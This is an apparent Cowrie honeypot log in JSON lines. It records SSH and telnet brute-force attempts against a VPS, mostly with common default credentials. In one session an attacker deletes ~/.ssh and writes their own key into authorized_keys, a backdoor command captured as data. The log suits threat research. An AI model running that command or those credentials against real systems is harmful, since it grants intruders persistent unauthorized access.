{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:57:27.046396Z","src_ip":"139.59.14.27","session":"0b397139091d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:27.333981Z","src_ip":"212.227.235.229","session":"88185e74ffd5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:57:27.399955Z","src_ip":"139.59.14.27","session":"0b397139091d"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"pass","message":"login attempt [usertest/pass] failed","sensor":"my-vps","timestamp":"2025-09-08T12:57:28.931848Z","src_ip":"139.59.14.27","session":"0b397139091d"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:30.317413Z","src_ip":"139.59.14.27","session":"0b397139091d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39248,"dst_ip":"1.2.3.4","dst_port":22,"session":"39fbc8e0a801","protocol":"ssh","message":"New connection: 212.227.235.229:39248 (1.2.3.4:22) [session: 39fbc8e0a801]","sensor":"my-vps","timestamp":"2025-09-08T12:57:33.880239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:57:33.881083Z","src_ip":"212.227.235.229","session":"39fbc8e0a801"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:57:34.039301Z","src_ip":"212.227.235.229","session":"39fbc8e0a801"}
{"eventid":"cowrie.login.failed","username":"gabriel","password":"gabriel123","message":"login attempt [gabriel/gabriel123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:57:34.711856Z","src_ip":"212.227.235.229","session":"39fbc8e0a801"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:35.871753Z","src_ip":"212.227.235.229","session":"39fbc8e0a801"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":45866,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a5fa818d088","protocol":"ssh","message":"New connection: 134.199.174.250:45866 (1.2.3.4:22) [session: 4a5fa818d088]","sensor":"my-vps","timestamp":"2025-09-08T12:57:40.244688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:57:40.245449Z","src_ip":"134.199.174.250","session":"4a5fa818d088"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:57:40.581004Z","src_ip":"134.199.174.250","session":"4a5fa818d088"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pass123","message":"login attempt [admin/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:57:41.496332Z","src_ip":"134.199.174.250","session":"4a5fa818d088"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:42.759194Z","src_ip":"134.199.174.250","session":"4a5fa818d088"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35886,"dst_ip":"1.2.3.4","dst_port":23,"session":"83c9bb8cbc7c","protocol":"telnet","message":"New connection: 212.227.235.229:35886 (1.2.3.4:23) [session: 83c9bb8cbc7c]","sensor":"my-vps","timestamp":"2025-09-08T12:57:43.287769Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:57:43.482410Z","src_ip":"212.227.235.229","session":"83c9bb8cbc7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:57:43.499207Z","src_ip":"212.227.235.229","session":"83c9bb8cbc7c"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T12:57:43.500396Z","src_ip":"212.227.235.229","session":"83c9bb8cbc7c"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T12:57:43.500947Z","src_ip":"212.227.235.229","session":"83c9bb8cbc7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38652,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecc43d875f09","protocol":"ssh","message":"New connection: 212.227.235.229:38652 (1.2.3.4:22) [session: ecc43d875f09]","sensor":"my-vps","timestamp":"2025-09-08T12:57:45.456202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:57:45.456901Z","src_ip":"212.227.235.229","session":"ecc43d875f09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:57:45.719872Z","src_ip":"212.227.235.229","session":"ecc43d875f09"}
{"eventid":"cowrie.login.failed","username":"debian","password":"P@ssw0rd","message":"login attempt [debian/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T12:57:46.852039Z","src_ip":"212.227.235.229","session":"ecc43d875f09"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:57:48.175143Z","src_ip":"212.227.235.229","session":"ecc43d875f09"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":59638,"dst_ip":"1.2.3.4","dst_port":22,"session":"a328a823db18","protocol":"ssh","message":"New connection: 134.199.174.250:59638 (1.2.3.4:22) [session: a328a823db18]","sensor":"my-vps","timestamp":"2025-09-08T12:58:10.496564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:58:10.497472Z","src_ip":"134.199.174.250","session":"a328a823db18"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:58:10.940027Z","src_ip":"134.199.174.250","session":"a328a823db18"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123abc","message":"login attempt [admin/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T12:58:12.037834Z","src_ip":"134.199.174.250","session":"a328a823db18"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:13.377987Z","src_ip":"134.199.174.250","session":"a328a823db18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54888,"dst_ip":"1.2.3.4","dst_port":23,"session":"58e495cf1d44","protocol":"telnet","message":"New connection: 212.227.125.160:54888 (1.2.3.4:23) [session: 58e495cf1d44]","sensor":"my-vps","timestamp":"2025-09-08T12:58:16.503352Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39474,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a6d97b32ff9","protocol":"ssh","message":"New connection: 212.227.235.229:39474 (1.2.3.4:22) [session: 7a6d97b32ff9]","sensor":"my-vps","timestamp":"2025-09-08T12:58:24.155512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:58:24.157415Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:58:24.451369Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55366,"dst_ip":"1.2.3.4","dst_port":22,"session":"0eaee6ee42a7","protocol":"ssh","message":"New connection: 212.227.235.229:55366 (1.2.3.4:22) [session: 0eaee6ee42a7]","sensor":"my-vps","timestamp":"2025-09-08T12:58:24.900536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:58:24.901495Z","src_ip":"212.227.235.229","session":"0eaee6ee42a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:58:25.033074Z","src_ip":"212.227.235.229","session":"0eaee6ee42a7"}
{"eventid":"cowrie.login.failed","username":"boris","password":"boris.123","message":"login attempt [boris/boris.123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:58:25.605797Z","src_ip":"212.227.235.229","session":"0eaee6ee42a7"}
{"eventid":"cowrie.login.success","username":"root","password":"calvin","message":"login attempt [root/calvin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:58:25.623980Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:58:26.267036Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:58:26.267736Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:58:26.269082Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:26.563370Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:26.739568Z","src_ip":"212.227.235.229","session":"0eaee6ee42a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:58:27.208014Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:58:27.208678Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:58:27.505422Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:27.506335Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40670,"dst_ip":"1.2.3.4","dst_port":22,"session":"c876c78ac61f","protocol":"ssh","message":"New connection: 212.227.235.229:40670 (1.2.3.4:22) [session: c876c78ac61f]","sensor":"my-vps","timestamp":"2025-09-08T12:58:27.792342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:58:27.794331Z","src_ip":"212.227.235.229","session":"c876c78ac61f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:58:28.084471Z","src_ip":"212.227.235.229","session":"c876c78ac61f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:58:29.248569Z","src_ip":"212.227.235.229","session":"c876c78ac61f"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:30.544099Z","src_ip":"212.227.235.229","session":"c876c78ac61f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41978,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5a9dc49b219","protocol":"ssh","message":"New connection: 212.227.235.229:41978 (1.2.3.4:22) [session: a5a9dc49b219]","sensor":"my-vps","timestamp":"2025-09-08T12:58:30.849279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:58:30.850528Z","src_ip":"212.227.235.229","session":"a5a9dc49b219"}
